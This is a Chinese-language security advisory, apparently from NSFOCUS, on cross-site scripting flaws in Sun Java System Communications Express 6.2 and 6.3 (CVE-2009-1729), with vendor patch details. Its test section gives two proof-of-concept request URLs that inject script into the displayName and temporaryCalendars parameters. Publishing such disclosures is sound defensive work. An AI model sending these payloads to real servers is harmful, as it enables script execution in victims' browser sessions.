安全研究

安全漏洞
Sun Communications Express多个跨站脚本漏洞

发布日期:2009-05-19
更新日期:2009-05-21

受影响系统:
Sun Java System Communications Express 6.3
Sun Java System Communications Express 6.2
描述:
BUGTRAQ  ID: 34154,34155
CVE(CAN) ID: CVE-2009-1729

Sun Java System Communications Express为Sun Java通讯套件提供了WEB客户端,允许通过浏览器管理邮件、日历、任务等。

Sun Java System Communications Express的https://<server>/uwc/abs/search.xml? 和http://<server>/uwc/base/UWCMain 文件中存在跨站脚本漏洞。如果远程攻击者向服务器提交了带有畸形参数的GET请求的话,就可以导致在用户浏览器会话中执行任意脚本代码。

<*来源:Core Security Technologies
  
  链接:http://marc.info/?l=bugtraq&m=124285268209434&w=2
        http://secunia.com/advisories/32474/
        http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-258068-1
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

https://<server>/uwc/abs/search.xml?bookid=e11e46531a8a0&j_encoding=UTF-8&uiaction=quickaddcontact&entryid=&valueseparator=%3B&prefix=abperson_&stopalreadyselected=1&isselchanged=0&idstoadd=&selectedbookid=&type=abperson%2Cgroup&wcfg_groupview=&wcfg_searchmode=&stopsearch=1&expandgroup=&expandselectedgroup=&expandonmissing=&nextview=&bookid=e11e46531a8a0&actionbookid=e11e46531a8a0&searchid=7&filter=entry%2Fdisplayname%3D*&firstentry=0&sortby=%2Bentry%2Fdisplayname&curbookid=e11e46531a8a0&searchelem=0&searchby=contains&searchstring=Search+for&searchbookid=e11e46531a8a0&abperson_givenName=aa&abperson_sn=aa&abperson_piEmail1=a%40a.com&abperson_piEmail1Type=work&abperson_piPhone1=11&abperson_piPhone1Type=work&quickaddprefix=abperson_&abperson_displayName=%3Cscript%3Ealert%28%27xss2%27%29%3C%2Fscript%3E%2C+%3Cscript%3Ealert%28%27xss1%27%29%3C%2Fscript%3E&abperson_entrytype=abperson&abperson_memberOfPIBook=e11e46531a8a0

http://<server>/uwc/base/UWCMain?anon=true&calid=test@test.com&caltype=temporaryCalids&date=20081223T143836Z&category=All&viewctx=day&temporaryCalendars=test@test.com%27;alert(%27hello%27);a=%27

建议:
厂商补丁:

Sun
---
Sun已经为此发布了一个安全公告(Sun-Alert-258068)以及相应补丁:
Sun-Alert-258068:Cross-Site Scripting (XSS) Vulnerability in Sun Java System Communications Express
链接:http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-258068-1

浏览次数:2720
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客